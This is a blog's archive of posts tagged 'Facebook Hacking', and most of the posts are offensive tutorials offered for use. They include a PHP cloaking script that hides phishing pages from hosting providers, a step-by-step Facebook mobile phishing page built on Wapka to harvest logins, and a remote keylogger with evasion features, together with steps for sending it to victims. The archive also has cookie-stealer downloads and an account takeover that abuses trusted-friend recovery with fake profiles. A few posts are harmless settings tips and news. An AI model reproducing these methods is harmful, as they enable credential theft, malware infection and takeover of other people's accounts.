Showing posts with label Facebook Hacking. Show all posts
Showing posts with label Facebook Hacking. Show all posts

How to make Single Name Account on Facebook or How to Hide Last Name on Facebook.

Many people have been searching on Google about How to make Single Name account on Facebook? or How to Hide Last Name on Facebook?    Well, here is a simple method explaining about how to make single name account on facebook successfully but one thing you should make a note is Indonesians are officially allowed to have single name on facebook as most of the people on Indonesia have only one name and that’s why Facebook allows them to have the single name. Steps for how to make Single name account / Hide last name on facebook :   Step 1 : From your Mozilla Firefox browser, open your facebook account and go to " General Account Settings ".

How to Hack Facebook Fan Page by Hijacking



However it's a simple facebook bug which helps the admins to remove another admin. However facebook should set up a rule that the original admins should not be removed. The following video by Sophos explains how easy it is to hijack facebook fan pages.However it's quite strange to see according to facebook help page, Primary or original admin cannot be removed. However it's untrue. Which evolves the whole idea of Hijacking facebook fan pages.http://www.youtube.com/watch?feature=player_embedded&v=4LSKEoXJUDY ( Hijacking Facebook fan pages tutorial )

Make Successful Phishing Without Getting Catch by Web Hosting sites

Hacking web application is always curious for the script kiddies.
And hacking free web email account is every geek first attempt and it was also same for me too.
I have created my first phishing page when I was in standard 9.
After i'v created the phishing page it's got suspended within 5-6 hours. :( So it was a big challenge for me to host my phishing sites. But it was big a challenge until I’v learned some basics of php.


Here i will not describe how phishing works and how to make fake page.
I will describe how can you fool your hosting provides and host your phishing content to their server without getting suspended by them.



While Web Hosting providers attempts to find all phishing attempts from their servers, sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files.

This concept is to serve a different innocent looking web page instead of your phishing page when your hosting provider try to access your uploaded content.
but when you send the link to your phishing site to victim you will send the link with a unique identification number(through URL i will come to this later).
Then only your innocent looking uploaded file turn into a phishing page.

I have tried this with 2-3 free hosting providers and every time i succeeded.
In normal scenario when you design your phishing page and upload files to your hosting account,
your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account.


So how to bypass this??


Open any page you want to clone in your favorite browser.

Save the full page in .html.This step is almost common for every phishing attempt.

After saving the page you will get the page's source code and also get a folder containing all the images and client side scripts.
I am assuming, you know how to configure the action field of the form/login page to configure a phishing page.
So after changing the action field what you have to do just rename the “html” page to ".jpg"
For example if you have "Login.html". Just rename it to "Login.jpg".

Now you have to choose any web page which will be served when your web hosting providers or anyone without having that unique identification number access the page.Do the same thing with that fake page also and rename it to "fake.jpg"

Create a new file called “phishing.php” and write following content into it.

<?php
$id = $_GET["code"];
if ($id == "yourpasscode") {
$myFile = "main.jpg";
$fh = fopen($myFile, 'r');
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}

else{
$myFile1 = "fake.jpg";
$fh1 = fopen($myFile1, 'r');
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>

In this code you just have to do following modification..

1>Change "yourpasscode" to your desired one.
2>Change "main.jpg" to the file name which one contain the real phishing web page's code "Login.jpg"
3>Change "fake.jpg" to the file which file will contain the code of the fake page.




Now you have got the follwing files:

1)phishing.php
2)login.jpg
3)fake.jpg
4)A folder[Contains all the client side scriots and images for the real phishing page]



Now just upload all this to your hosting account.And try to access the
http://yoursite.com/phishing.php 
with your browser.

Here you will get the fake page which is not actual login page.

Now try to access
http://yoursite.com/phishing.php?code=yourpasscode
your phishing page will open.

If you want to change the GET parameter "code" just modify the second line of the php script.

Now what will happen,when your hosting privder will test your content they will get a innocent php file reading another file.and when they try will to access "login.jpg" file they will get an invalid/corrupted image.

Hack facebook Account by Mobile - Phishing


What is Phishing ?
Phishing is a way of deceiving your victim by making him login through one of your webpages which is a copy of the original one. By doing so the fake webpage will save his E-mail ID or username and password. This is used for criminal activities for stealing Credits Cards and So on.

Now we are going to make a fake login page of Facebook Mobile.

Lets start the tutorial...
Step 1: Register a new Wapka Account
First create a new wapka account from the link below.
image

Step 2: Editing Wapka Texts
Login to your Wapka account. Goto Settings>Edit text> Forum/chat and change the following words,

Name: Email or Phone 
Text: Password 
Submit: Log In 
It's shown in the screenshot below.
image
Click 'Edit' to save and Login to your account in ADMIN mode.
Step 3: Create a new forum
Create a new forum to save all hacked usernames and passwords in your site.
You can do it by Edit Site>Forum
Wapka forum
Get inside your newly created forum and note down its Forum ID. You can find it at the right bottom corner of the forum. Its shown below.
Forum ID
Step 4: Change Forum Visibility 
The forum we create above will be visible to everyone. Now we have to change its visiblity, so that admin can only view the hacked usernames and passwords.
You can do it by Edit site>Users>Items visibility
Mark 'X' to make it visible only in admin mode.
image
Step 5: Uploading Facebook Mobile Phisher Page Source Code
Just copy and paste the code below in your site.
You can add it by Edit site>WML/HTML code

Note: But before pasting, edit the code and replace 'XXXXXXX' with your Forum ID( as you found it in step 4) and remove spaces in small form tag.

Now you can see your fully designed facebook phishing page.
But there'll be only one filed instead of 'Email or Phone' and 'Password' fields.
Don't worry, wapka won't ask usernames when you are logged in.
So just logout your admin mode or open your site url in a new tab. You'll see a page like this.
image
* You can find all hacked usernames and passwords in the forum by logging in as ADMIN.
Now use your social engineering skill to make the vitim to login in your site. You can send him a message with your link.
Disclaimer: DO NOT use this for fraudulent activities use this just to gain knowledge and not to cause harm to other people in any sort.
By trying this trick, you'll surely learn the basics of Hacking, HTML and Wapka.

If you got any problem, then describe the problem in comments below...

How to Permanentely Disable Facebook’s People You May Know Feature


I’ve found Facebook’s People you may know ’Feature’ a tad annoying to say the least, suggesting people I dont want to befriend because let’s face it, if I had wanted them as friends they would already be friends right? Facebook you’re not that smart yet I’m afraid! Plus you may just get fed up staring at the same old faces!
After searching for a while on Google I found a couple of groups on Facebook (Ironic) and read a few blog articles, however it soon became obvious that most of the workarounds don’t work anymore, so I had a think and here’s my little hack to disable this feature.

Getting it blocked

Now if you’re using Google’s Chrome or Mozilla Firefox to browse the web and have Adblock installed (What you haven’t? Sort it out.) as an addon/extension you can actually use this to block the suggested friends feature!  Click Here to Install it for Google Chrome
Although Adblock was created to, you guessed it block ads! It can also be used to block certain HTML elements on a webpage via CSS selectors.
After doing a little digging around using Chrome’s built in webkit inspect we can see exactly the elements we want to target (See the screenshot below).
Facebook's Suggest a Friend HTML markup
Facebook's Suggest a Friend HTML markup

Chrome

In the Customize AdBlock tab and under the heading section ‘Block more ads:’ you’ll want to click on ‘Hide a section of a webpage’ , it’ll prompt you for two things 1. ‘Domain of page to apply on’  and 2. ‘CSS to match’
1. For the domain
www.facebook.com
2. For the CSS
div[class="ego_section"]
Then click ‘Block it!’ and you should be all done.
Test on Chrome version 16.0.899.0 dev and AdBlock version 2.4.28

Firefox

The Firefox addon is slightly different to the Chrome version so here are the instructions:
  1. Open up the Adblock Plus Preferences window
  2. Click on the ‘Add Filter …’ button at the bottom
  3. If the filter was successfully added then a new section should appear in your filter list called ‘My Element Hiding Rules’ (If this doesn’t already exists that is)
  4. Click on the OK button.
Facebook Suggest Friends Block Firefox AdBlock
Facebook Suggest Friends Block Firefox AdBlock
Tested on Firefox version 7.01 and AdBlock Plus 1.3.10

Notes (Caveats)

There are a few caveats with this workaround at the moment however:
  1. Facebook may at any time and at their discretion change or alter the HTML elements Class/ID, completing breaking our rule!
  2. You’ll loose Facebook Events on the right hand side on your profile page (These are still accessable here https://www.facebook.com/events/ )
  3. Some other features I’ve yet to notice that have broken

How To Find Out Invisible Friends On Facebook Who Are Online


Most of the internet users uses Facebook and Google+ and other social networks and uses the chat option to friends,many of them facing a difficulty that some of them wants to get invisible friends on Facebook.In Google + there are many option in setting your status in chat option like Online,Busy,Invisible,Offline,Away,etc.But it is not a simple to show your status to invisible.

Why Friends Prefer To Set Status As Invisible

Invisible in chat means he is in Online but status is set to shown as Offline.So we are going to reveal him that he is offline but he is in online.When anyone want to spent more time in chat and but he don’t want to reveal it to anyone, he can prefer to set his status as offline by using invisible option.

How To Show Your Status As Invisible In Facebook

Follow the steps given below to set your status as invisible.
1-Log in to your Facebook account
2-Click on Friends Tab
3-Create friend list and add your friends those who want to see you as visible
4-Give a name to that list like Show Online or anything else

5-Click on the star button in chat box as shown below
invisible
6-Click on Limit Availability.
7-Select your list name and click on Only Make Me Available To: as shown below

-->
invisible8-Click On OK.
You will be only visible to that list you have selected.

How To View Invisible Friends On Chat

Now we are going to share a simple,but very useful trick to get visible the invisible friends on your chat in Facebook.Follow the steps given below to get shown the invisible friends.
1-Log in to your Facebook Account.
2-Go to Online Now Facebook Application
3-It asks for Request For Permission
4-Click on Allow
invisible
5-Now you will get shown all the friends who are online and set their status as invisible.

See Also : How To View Private Photos From Facebook? Facebook Photo Stalker

You can view the differences between the online friends in Facebook Chat Box and Online Now Chat Box from below in my account.There are only 159 friends online in normal chat box but 167 online in Online Now Chat box so there are 8 invisible friends in chat.
invisible

See Also : Internet Download Manager ( IDM ) Full Version Free Download


I am sure this trick is very useful and many of the Facebook users are searching for this trick.Now you can chat with your friends who are set their status as invisible.

Facebook Hacker v1.8 + keys Full Version - Facebook Hacking Software free Download


Facebook hacker v1.8 + keys | Full Version | 914 KB 
 
Facebook Hacker v1.0.7 is the latest stable build of the same program which destroyed the very 

foundations of the facebook servers, back then in 11 july 2009. Well, a lot happened since that 
"unfortunate event" and their security has improved. Luckily for our confident subscribing users, 
we absolutely love good challenges, and we started on cracking their protections once again, this 
time, we're doing it right, and we're hoping that the program will last for this entire year at least 
(2011)
That's why we decided to release a new, updated build of the program that we know you like, 
love and share.
INSTRUCTION
READ ME INCLUDED

How To Hack Any Account: Download Aployse Keylogger Full version free and Hack Gmail, Hotmail, Yahoo, Facebook Accounts




Here I am going to present a New Remote Keylogger which has the power to hack facebook accounts and to record all the key strokes typed


Features Of New UD Remote Keylogger :

  • UD - 3/33
  • You Can Use Gmail Account to get the logs
  • Add To Start Up also included
  • It also Kills Task Manager
  • Automatically Hides the virus after infecting the victim
  • Also Disables Registry Editing
  • Stops victim From Ending Your Keylogger's Process
  • New Icon Changer
  • File Binder
  • With Fake Error Message
  • Includes Time Interval

How To Use This Remote Keylogger for Hacking Of Facebook Accounts

Download The Remote UD Keylogger and extract the folder to desktop
- Open the Remote keylogger and enter new created Gmail account username and password
- Select the other settings as you need and donot forget to change Time Interval to 2 min
- If you want then use Icon changer, File Binder, etc and then click on Build Server
- Now upload this keylogger to file sharing sites like megaupload.com , mediafire.com
- Now send Server to victim by any mean and when he/she will click on server, he will be hacked
- Now you will get the victim typed keystroke which also includes Hack Facebook Account Password
- You can hack any account by this Remote Keylogger
 

Size: 40.17 KB

Its password is doh

Exclusive Facebook Auto Liker- Boost your Facebook Likes upto 100K

 Again back with a Working Facebook Hack which is known to be Facebook Likes Hack via Auto Liker sites mentioned below. Hence today i will show you how anybody can increase his/her status likes up-to 10,000 in less than no time. No programming language required to do this, all you have to authenticate your Facebook account via some Auto Liker sites and gets the job done for you!



Now lets read the procedure below.


http://www.likehoot.com/

http://megaliker.tk/

http://fb-autoliker.com/

http://www.powerlike.net/

http://www.ninetysevenxz.net/AutoLike-MY

http://www.zonedevil.org/AutoLiker/

http://www.moleckcyber.com/

http://www.autolike.org/

http://root.hackz.name/

http://fb-autolikes.webs.com/

http://an-ion.xtgem.com/Menu/autosuka

http://www.postliker.co.cc/

http://g.endut.net/

http://testajerkk.site88.net/

http://dimana.blogku.biz/

http://ninetysevenxz.net/

http://expert-free.net/

http://extreme-likers.tk/

http://likextreme.com/

http://autolikephc.co.cc/

http://likeabugger.weebly.com/

http://oyeahlike.weebly.com/

http://wendellocampo.weebly.com/

http://like.vipfree.us/

http://dimana.blogku.biz/

http://megaliker.tk/

http://diputus.in/

http://www.ninetysevenxz.net/AutoLike-MY

http://www.moleckcyber.com/

http://www.autolike.id.web.id/

http://autolikebot.net/

http://e-zonal.com/like.php

http://CyberZombie.Tk/

Important Note:Some of these sites are banned by their Web hosting provider so if you found error in opening them just skip them and move to another. Try visiting more n more sites to collect more Likes. Enjoy!
I will help you today and God will Help me tomorrow !

How To: Subscribe to Your Favorite Facebook Page via RSS

Do you want to keep up with the latest news for your favorite Facebook fan pages, but don’t want to miss out on them because EdgeRank is hiding them from your new feed? Or would you prefer to not have to go to Facebook at all until your favorite pages have updates?

One of the Google Chrome extensions I use, RSS Subscription Extension, puts an RSS icon in the browser’s address bar when there is an RSS feed discovered on a page. On Facebook pages that haven’t been converted to the new Timeline design, that icon comes up so you can subscribe to your favorite page’s RSS feed.
http://www.facebook.com/friendxcorner

For pages with the new design enabled, however, the RSS feed has gone missing.

Fortunately, the feed is still available though. You just need a little workaround. To get any page’s RSS feed, first you will need to grab the page’s ID number. For pages that do not have a customized username (http://facebook.com/username), the ID number will be at the end of the URL. For those pages that have a customized username, the quickest way to grab the ID is through the Open Graph. Simply take the page’s username and add it to the following URL.

https://graph.facebook.com/username

For example, my Facebook page URL is http://facebook.com/friendxcorner. Hence, the Open Graph URL would be https://graph.facebook.com/friendxcorner. This will show you the following.


{
"name": "A REAL man doesn't love million girls \"He loves one girl in million ways\"",
"is_published": true,
"website": "www.sweetfun.tk",
"username": "fRieNdX.CoRNer",
  "description": "\",
"about": "-------------> http://sweetfun.tk .............. Contact +923026705070 page created oN: 31 Aug 2011.. oN 2nd day of Eid ul fitr... 1:42pM....",
"phone": "03026705070",
"talking_about_count": 167,
"category": "Personal blog",
"id": "215026371884953",
"link": "https://www.facebook.com/fRieNdX.CoRNer",
"likes": 1657,
"cover": {
"cover_id": 428790120508576,
"source": "http://sphotos-a.ak.fbcdn.net/hphotos-ak-prn1/63125_428790120508576_1860672255_n.jpg",
"offset_y": 0
}
}


Highlighted in the above is my page’s ID number, 215026371884953. To create the RSS feed, take the page ID number and insert it in the following.

https://www.facebook.com/feeds/page.php?id=215026371884953&format=rss20


Take this URL and paste it into your preferred RSS Graffiti. Mine is Google Reader, so I would paste it in to the Subscribe field.

Now, you can see your favorite page’s updates all in your RSS Graffiti.

Hc Stealer (Steal Cookies and hack facebook gmail hotmail yahoo all id's)


Hc Stealer (Steal Cookies and hack facebook gmail hotmail yahoo all id's)


Download




Facebook Developers World HACK 2012 : PCH


Social networking site Facebook will roll out Facebook Developer World Hack 2012, which invites the application developer (developer) in the 12 cities selected to compete to make the application on Facebook. Jakarta, so one of the cities to be visited Facebook on 13 September.

Hack Facebook Developer World 2012 took place during August and September. In writing on official company blog, Facebook Developer Advocate James Pearce argues, cities visited this time was the city’s fastest-growing developer community and most dynamic.

In addition to Jakarta, the event also took place in Austin (USA), Mexico City (Mexico), Buenos Aires (Argentina), Sao Paulo (Brazil), Berlin (Germany), Taipei (Taiwan), Bangalore (India), Barcelona (Spain) , Vancouver (Canada), Marsaw (Poland), Moscow (Russia).

This event not only cater to the developers who had made an application on Facebook, but also developers who have ideas to develop social applications, or who are planning to distribute an application on Facebook.

Largest social networking site in the world will provide technical material about the open graph, Facebook API, SDK Mobile, and how to build a successful social game.

Furthermore, up to challenge developers to develop application code for 8 hours, with the help of Facebook team. Developers are also invited to demonstrate their products. There will be prizes for the best integration of applications and for developers who use API for best results.

The best teams from each continent will win a trip to visit Facebook headquarters in San Francisco, USA, and met with the Facebook developer team.

Facebook has not determined the location of the organization in Jakarta. Capacity of participants is limited and admission prices are Rp 236 375. Individual or group for developers who want to follow this competition, please sign up at: https://fbworldhack.com

source :  Facebook Developers World HACK 2012


How to Trace Mobile Numbers of any Country 100% working

With the rapid growth of mobile phone usage in recent years, we have often observed that the it has become a part of many illegal and criminal activities. So, in most cases tracing the mobile number becomes a vital part of the investigation process. Also, sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call list or similar.


All you need for this is only the first 4-digit of the mobile number. In this Wiki page you will find all the mobile number series listed in a nice tabular column where they are categorized based on mobile operator and the zone (state/city). This Wiki page is updated regularly so as to provide up-to-date information on newly added mobile number series and operators. I have used this page many a time and have never been disappointed.

If you would like to use a simpler interface where in you can just enter the target mobile number and trace the desired details, you can try this link from Numbering Plans. Using this link, you can trace any number in the world.

By using the information in this article, you can only know “where” the call is from and not “who” the caller is. Only the mobile operator is able to tell you ”who” the caller is. So, if you are in an emergency and need to find out the actual person behind the call, I would recommend that you file a complaint and take the help of police. I hope this information has helped you!

Click Here To Trace 

After clicking, wait 5 seconds and then click on SKIP AD

NOTE:
it is 100% working


Keylogging: Easiest Way to Hack Password


Using a keylogger is the easiest way to hack email or any other password. A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard.

A keylogger is also called as spy program or spy software. The special thing about keylogger is that anyone with a basic knowledge of computer should be able to install and use this software. So, you don’t need to be an expert or have any special knowledge. With my experience, I recommend the following keylogger as the best for your password hacking needs:.
SniperSpy (TESTED) is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail or Hotmail. There are absolutely *NO* limitations to what accounts or websites this software can access!



Download

Free download KeyProwler for facebook

Free download KeyProwler for facebook
Download

007 Facebook Hack With Mediafire Link

Hc Stealer (Steal Cookies and hack facebook gmail hotmail yahoo all id's)

Facebook Friend Adder ( send Request to 1000 Friends with in 1 minute)

send Request to 1000 Friends with in 1 minute


Download

Facebook Account Hacker v 2.4 100% Working [Torrent File]

Hack Any Facebook Account Using 3 Fake Profiles Trick



Disclaimer: This article is for educational purpose. It is to educate you about how your profile can be hacked by others, but not to encourage readers into hacking others accounts.
Please don’t believe any site or software which claims to help you hack facebook profiles, you’ll end up installing dangerous virus on your computer or being your own account hacked. Today i am going to teach you, how to hack facebook profile without using traditional Phishing, Keylogging and other Social Techniques. In this hack i’ll be using facebook’s own Trusted Friends Password Recovery method.
Requirements:
1> 3 Fake Profiles.
2> Firefox and Chrome.
3> Patience and little Luck.
-> Create three fake profiles by your yourself. You have to send add requests from these profiles to the victim. Before sending these customize these profiles in such a way that the victim adds these profiles without any suspicion icon wink Hack Any Facebook Account Using 3 Fake Profiles Trick Make sure one of this profiles goes to same school as victim, one has same workplace and last one has same surname, Trust me you’ll thank me later. One last thing. One last thing these accounts should be older than 7 days. After the victim has accepted the friend requests, interact a little with victim using these profiles(like add a comment,tag a photo etc). If you’re done, trap has been set for victim.

Steps:
Just to make sure this thing really works i’ve tested this to hack my own profile and couple other business profiles of mine today(christmas.2011) and it works.
1> Open Chrome and Go to www.facebook.com and click on ‘Forgot your Password?’ link. If you know the victims username or email (you can get this from victims profile info) enter them, other wise go down and enter victims name & your fake profile name.
2> Click on ‘No Longer Access to These’. Facebook will say you to enter new email account that you have now full access to send you the recovery details(I suggest you to enter a Fake or Temporary email address for safety purpose).
Unless you’re trying these steps for first time, chances are that facebook will not ask you to provide new email account. Instead it will give you some info about how to regain access to old email account. This is where the Patience and luck plays its part, facebooks checks if your attempting to hack others accounts and writes corresponding cookies, if you’re one of them. Clear your chrome cookies/cache and reset your internet connection/change your ip then restart your browser and keep trying. Thats what i did untill i reached step 33> Now Facebook will ask you to answer the Security question, well if you have some guesses about that one then check your luck, If you’re lucky enough and took the right guess you’ll get window where you can reset victims password. But if you don’t know it, then don’t worry annd simply enter 3-4 reasonable wrong answers and it will take you to step 4.
Again, Facebook is not made by bunch of fools .It checks if your attempting to hack others accounts and writes corresponding cookies, if it you’re one of them, you’ll be told to enter a email id victims profile name. If this happens Clear your chrome cookies/cache and reset your internet connection/change your ip then restart your browser and keep trying. Thats what i did untill i reached step 4
4> Now Facebook will ask you to select three friends from a selective list of trusted friends. Remember when i told you to customize your profiles with same school, workplace and stuff? those setting will land your fake profiles in this trusted lists. If it doesn’t just go through the requirements section again. Then select your three fake profiles from the list and hit continue.
5> Click ‘send security codes’ in new page. Now open Firefox and login into fake accounts copy the security codes and past them in corresponding fields. Facebook will now send you Resetting email from Facebook on the account you entered in Step 2.
This is how a facebook profile can be hacked.
Protect Your Account: About 60,000 account have been hacked since facebook has introduced this new concept of trusted friends. To protect your account from these kind of attacks, don’t add strangers and hide your email id by changing privacy settings.
Have Fun!! Happy Facebooking!!

 →

Total Pageviews

Powered by Blogger.
Flag Counter
 
PrinceofWah
Blogger Designed by sWeet sUNny (Muhammad Arif) Join Us on Facebook Page www.princeofwah.blogspot.com | Join Us on Facebook Group I Love Pakistan